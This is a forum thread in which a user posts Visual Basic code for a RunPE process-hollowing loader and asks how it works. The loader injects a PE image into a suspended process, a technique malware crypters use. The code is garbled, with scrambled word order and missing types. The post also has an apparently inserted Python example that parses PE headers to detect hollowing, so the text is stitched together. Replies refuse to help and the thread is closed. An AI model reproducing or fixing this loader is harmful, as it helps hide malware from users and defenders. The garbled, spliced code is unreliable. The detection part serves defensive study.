Thread: How to make a RunPE

  1. #1

    Thread Starter
    Registered User
    Join Date
    Mar 2013

    How to make a RunPE

    Hello, I want to know how to make a RunPE in
    Option Explicit
     CONTEXT_FULL As Long Private Const = & H10007
     Private Const MAX_PATH As Integer = 260
     CREATE_SUSPENDED As Long Private Const = & H4
     MEM_COMMIT As Long Private Const = & H1000
     MEM_RESERVE As Long Private Const = & H2000
     PAGE_EXECUTE_READWRITE As Long Private Const = & H40
     Private Declare Function CreateProcessA Lib "Kernel32" (ByVal LpAppName As String, ByVal LpCommandLine As String, ByVal LpProcessAttributes As Long, ByVal LpThreadAttributes As Long, ByVal BInheritHandles As Long, ByVal DwCreationFlags As Long, ByVal LpEnvironment As Long, ByVal LpCurrentDirectory As Long, LpStartupInfo As STARTUPINFO, LpProcessInformation As PROCESS_INFORMATION) As Long
     Private Declare Function WriteProcessMemory Lib "Kernel32" (ByVal HProcess As Long, LpBaseAddress As Any, BvBuff As Any, ByVal NSize As Long, LpNumberOfBytesWritten As Long) As Long
     Private Declare Function OutputDebugString Lib "Kernel32" Alias "OutputDebugString" (ByVal LpOutputString As String) As Long
     Public Declare Sub RtlMoveMemory Lib "Kernel32" (Dest As Any, Src As Any, ByVal L As Long)
     Private Declare Function CallWindowProc Lib "User32" (ByVal Addr As Long, ByVal P1 As Long, ByVal P2 As Long, ByVal P3 As Long, ByVal P4 As Long) As Long
     Private Declare Function GetProcAddress Lib "Kernel32" (ByVal HModule As Long, ByVal LpProcName As String) As Long
     Private Declare Function LoadLibraryA Lib "Kernel32" (ByVal LpLibFileName As String) As Long
     NLength As Long
     As Long LpSecurityDescriptor
     As Long BInheritHandle
     End Type
     Type Private STARTUPINFO
     Cb As Long
     As Long LpReserved
     As Long LpDesktop
     As Long LpTitle
     As Long DwX
     As Long DwY
     As Long DwXSize
     As Long DwYSize
     As Long DwXCountChars
     As Long DwYCountChars
     As Long DwFillAttribute
     DwFlags As Long
     WShowWindow As Integer
     CbReserved2 As Integer
     As Long LpReserved2
     As Long HStdInput
     As Long HStdOutput
     As Long HStdError
     End Type
     HProcess As Long
     HThread As Long
     As Long DwProcessId
     As Long DwThreadId
     End Type
     Type Private FLOATING_SAVE_AREA
     As Long ControlWord
     As Long StatusWord
     As Long TagWord
     As Long ErrorOffset
     As Long ErrorSelector
     As Long DataOffset
     As Long DataSelector
     RegisterArea (1 To 80) As Byte
     As Long Cr0NpxState
     End Type
     Type Private CONTEXT
     As Long ContextFlags
     As Long DR0
     Dr1 As Long
     Dr2 As Long
     As Long Dr3
     As Long DR6
     As Long DR7
     As Long SegGs
     As Long SegFs
     As Long SEGESA
     As Long SegDs
     Edi As Long
     Esi As Long
     As Long Ebx
     As Long Edx
     As Long Ecx
     As Long Eax
     As Long Ebp
     As Long Eip
     As Long SegCs
     As Long EFLAGS
     As Long GMT
     As Long SegSs
     End Type
     Type Private IMAGE_DOS_HEADER
     E_magic As Integer
     E_cblp As Integer
     E_cp As Integer
     E_crlc As Integer
     E_cparhdr As Integer
     E_minalloc As Integer
     E_maxalloc As Integer
     E_ss As Integer
     E_sp As Integer
     E_csum As Integer
     E_ip As Integer
     E_cs As Integer
     E_lfarlc As Integer
     E_ovno As Integer
     E_res (0 To 3) As Integer
     E_oemid As Integer
     E_oeminfo As Integer
     E_res2 (0 To 9) As Integer
     As Long E_lfanew
     Type End
     Type Private IMAGE_FILE_HEADER
     Machine As Integer
     NumberOfSections As Integer
     As Long TimeDateStamp
     As Long PointerToSymbolTable
     As Long NumberOfSymbols
     SizeOfOptionalHeader As Integer
     Características As Integer
     End Type
     As Long VirtualAddress
     Size As Long
     End Type
     Magic As Integer
     MajorLinkerVersion As Byte
     MinorLinkerVersion As Byte
     As Long SizeOfCode
     As Long SizeOfInitializedData
     As Long SizeOfUnitializedData
     As Long AddressOfEntryPoint
     As Long BaseOfCode
     As Long BaseOfData
     'NT Additional Fields.
     ImageBase As Long
     As Long SectionAlignment
     As Long FileAlignment
     MajorOperatingSystemVersion As Integer
     MinorOperatingSystemVersion As Integer
     MajorImageVersion As Integer
     MinorImageVersion As Integer
     MajorSubsystemVersion As Integer
     MinorSubsystemVersion As Integer
     As Long W32VersionValue
     As Long SizeOfImage
     As Long SizeOfHeaders
     CheckSum As Long
     SubSystem As Integer
     DllCharacteristics As Integer
     As Long SizeOfStackReserve
     As Long SizeOfStackCommit
     As Long SizeOfHeapReserve
     As Long SizeOfHeapCommit
     As Long LoaderFlags
     As Long NumberOfRvaAndSizes
     DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY
     End Type
     Type Private IMAGE_NT_HEADERS
     Signature As Long
     As FileHeader IMAGE_FILE_HEADER
     As OptionalHeader IMAGE_OPTIONAL_HEADER
     End Type
     SecName As String * 8
     As Long VirtualSize
     As Long VirtualAddress
     As Long SizeOfRawData
     As Long PointerToRawData
     As Long PointerToRelocations
     As Long PointerToLinenumbers
     NumberOfRelocations As Integer
     NumberOfLinenumbers As Integer
     As Long Características
     End Type
     CallAPI Private Function (ByVal Slib As String, ByVal Smod As String, ParamArray Params ()) As Long
     As Long Dim LPTR
     Dim BvASM (& HEC00 & - 1) As Byte
     Dim I As Long
     As Long Dim LMOD
     LMOD = GetProcAddress (LoadLibraryA (SLIB), Smod)
     If LMOD = 0 Then Exit Function
     LPTR = VarPtr (BvASM (0))
     ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4
     ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 =
     For I = UBound (Params) To 0 Step -1
     ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 =
     ByVal RtlMoveMemory LPTR, CLng (Params (I)), & H4: LPTR LPTR + 4 =
     ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 =
     ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 =
     ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 =
     CallAPI = CallWindowProc (VarPtr (BvASM (0)), 0, 0, 0, 0),
     End Function
     Injec Sub (ByVal SHost As String, ByRef BvBuff () As Byte, Parameter As String)
     Dim I As Long
     Dim As IMAGE_NT_HEADERS Pinho
     Ctx Dim As CONTEXT
     Si.Cb = Len (Si)
     IHDP RtlMoveMemory, BvBuff (0), 64
     RtlMoveMemory Pinho, BvBuff (Pidh.E_lfanew), 248
     CreateProcessA SHost, "" & Parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
     CallAPI "Ntdll", "NtUnmapViewOfSection" Pi.HProcess, Pinh.OptionalHeader.ImageBase
     CallAPI "Kernel32" "VirtualAllocEx" Pi.HProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE
     WriteProcessMemory Pi.HProcess, ByVal Pinh.OptionalHeader.ImageBase, BvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0
     For I = 0 To Pinh.FileHeader.NumberOfSections - 1
     Pish RtlMoveMemory, BvBuff (Pidh.E_lfanew + 248 + 40 * I), Len (Pish)
     WriteProcessMemory Pi.HProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, BvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0
     Next I
     Ctx.ContextFlags = CONTEXT_FULL
     CallAPI "Kernel32", "GetThreadContext" Pi.HThread, VarPtr (Ctx)
     WriteProcessMemory Pi.HProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
     Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
     CallAPI "Kernel32", "SetThreadContext" Pi.HThread, VarPtr (Ctx)
     CallAPI "Kernel32", "ResumeThread" Pi.HThread
     Sub End
     StrToBytArray Public Function (ByVal SSTR As String) As Byte ()
     Dim I As Long
     Dim Buffer () As Byte
     ReDim Buffer (Len (SSTR) - 1)
     For I = 1 To Len (SSTR)
     Buffer (I - 1) = Asc (Mid (SSTR, I, 1))
     Next I
     StrToBytArray = Buffer
     End Function
     ThisExe Public Function () As String
     As Long Dim LRET
     Dim BvBuff (255) As Byte
     CallAPI LRET = ("Kernel32", "GetModuleFileNameA" App.HInstance, VarPtr (BvBuff (0)), 256)
     ThisExe $ = Left (StrConv (BvBuff, VbUnicode) LRET)
     End Function

    I got this code from the web, but don't understand a bit of it, please help.
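    The snippet in the post only reads a handful of PE header fields: it copies the 64-byte IMAGE_DOS_HEADER, takes E_lfanew, copies the 248-byte IMAGE_NT_HEADERS from there, and walks the 40-byte IMAGE_SECTION_HEADER entries at E_lfanew + 248 + 40 * i, using ImageBase, SizeOfImage, SizeOfHeaders and AddressOfEntryPoint. The Python below is an added, stand-alone example (not code from the thread) that parses exactly those fields from a byte buffer at the same offsets, and then compares two parsed header sets the way an analyst compares the headers read back from a running process with the headers of the file on disk: a mismatched entry point, image base or section layout is the classic indicator that a process was hollowed. Both PE blobs are constructed in the example; no real binary is read.

```python
import struct

DOS_HEADER_SIZE = 64        # IMAGE_DOS_HEADER, e_lfanew lives at offset 60
NT_HEADERS_SIZE = 248       # PE32: 4-byte signature + 20-byte file header + 224-byte optional header
SECTION_HEADER_SIZE = 40    # IMAGE_SECTION_HEADER


def build_pe32(image_base, entry_point, size_of_image, sections):
    """Construct a minimal PE32 header blob (constructed test data, not a real binary).
    sections: list of (name, virtual_address, virtual_size, pointer_to_raw, size_of_raw).
    Only the fields a loader reads are filled in; everything else is zero."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", DOS_HEADER_SIZE)   # e_lfanew = 64
    file_hdr = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, 224, 0x0102)
    size_of_headers = DOS_HEADER_SIZE + NT_HEADERS_SIZE + SECTION_HEADER_SIZE * len(sections)
    # Magic, linker versions, SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData,
    # AddressOfEntryPoint, BaseOfCode, BaseOfData
    opt = struct.pack("<HBBIIIIII", 0x010B, 0, 0, 0, 0, 0, entry_point, 0, 0)
    # ImageBase, SectionAlignment, FileAlignment, six version words, Win32VersionValue,
    # SizeOfImage, SizeOfHeaders, CheckSum, Subsystem, DllCharacteristics,
    # stack/heap reserve+commit, LoaderFlags, NumberOfRvaAndSizes
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII",
                       image_base, 0x1000, 0x200, 0, 0, 0, 0, 0, 0,
                       0, size_of_image, size_of_headers, 0, 2, 0,
                       0, 0, 0, 0, 0, 16)
    opt += b"\x00" * (8 * 16)                                          # 16 empty data directories
    assert len(opt) == 224
    nt = b"PE\x00\x00" + file_hdr + opt
    sec_blob = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), vsize, va, rsize, rptr,
                    0, 0, 0, 0, 0x60000020)
        for (name, va, vsize, rptr, rsize) in sections)
    return dos + nt + sec_blob


def parse_pe32_headers(buf):
    """Read the fields the thread's loader uses, at the same offsets it uses."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 60)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", buf, e_lfanew + 6)[0]
    opt = e_lfanew + 24                      # optional header follows the 20-byte file header
    if struct.unpack_from("<H", buf, opt)[0] != 0x010B:
        raise ValueError("not a PE32 image")
    entry_point = struct.unpack_from("<I", buf, opt + 16)[0]
    image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    size_of_image, size_of_headers = struct.unpack_from("<II", buf, opt + 56)
    sections = []
    for i in range(num_sections):
        off = e_lfanew + NT_HEADERS_SIZE + SECTION_HEADER_SIZE * i   # same stride as the VB loop
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", buf, off)
        sections.append((name.rstrip(b"\x00").decode("ascii", "replace"), va, vsize, rptr, rsize))
    return {"e_lfanew": e_lfanew, "image_base": image_base, "entry_point": entry_point,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "sections": sections}


def hollowing_indicators(disk, mem):
    """Compare headers of the on-disk file with headers read back from the process image.
    A hollowed process shows a different entry point, image base, image size or
    section layout from the file the process claims to be running."""
    findings = []
    for key in ("image_base", "entry_point", "size_of_image"):
        if disk[key] != mem[key]:
            findings.append("%s differs: disk=0x%X mem=0x%X" % (key, disk[key], mem[key]))
    if [s[:2] for s in disk["sections"]] != [s[:2] for s in mem["sections"]]:
        findings.append("section names/virtual addresses differ")
    return findings


def demo():
    # Constructed "on-disk" headers versus constructed headers "read from a process" that
    # was replaced by a different image at the same base.
    disk = build_pe32(0x400000, 0x1000, 0x3000,
                      [(b".text", 0x1000, 0x800, 0x400, 0x800), (b".data", 0x2000, 0x200, 0xC00, 0x200)])
    mem = build_pe32(0x400000, 0x2500, 0x5000, [(b".text", 0x1000, 0x2000, 0x400, 0x2000)])
    return hollowing_indicators(parse_pe32_headers(disk), parse_pe32_headers(mem))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Comparing a process's in-memory headers with its backing file is only one signal; a defender would also check that the mapped image at the PEB's ImageBaseAddress is file-backed and that the main thread's start address lies inside it.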

  2. #2
    PowerPoster dunfiddlin's Avatar
    Join Date
    Jun 2012

    Re: How to make a RunPE

    As there does not appear to be any legitimate use for such a program I don't think anyone here will be willing to fall foul of the site's membership terms to help.
    As the 6-dimensional mathematics professor said to the brain surgeon, "It ain't Rocket Science!"

    Reviews: "dunfiddlin likes his DataTables" - jmcilhinney

    Please be aware that whilst I will read private messages (one day!) I am unlikely to reply to anything that does not contain offers of cash, fame or marriage!

  3. #3
    Fanatic Member Arve K.'s Avatar
    Join Date
    Sep 2008
    Kyrksæterøra, Norway
    Arve K.

    Please mark your thread as resolved and add reputation to those who helped you solve your problem
    Disclaimer: I am not a professional programmer

  4. #4
    I'm about to be a PowerPoster! Joacim Andersson's Avatar
    Join Date
    Jan 1999

    Re: How to make a RunPE

    Thread closed.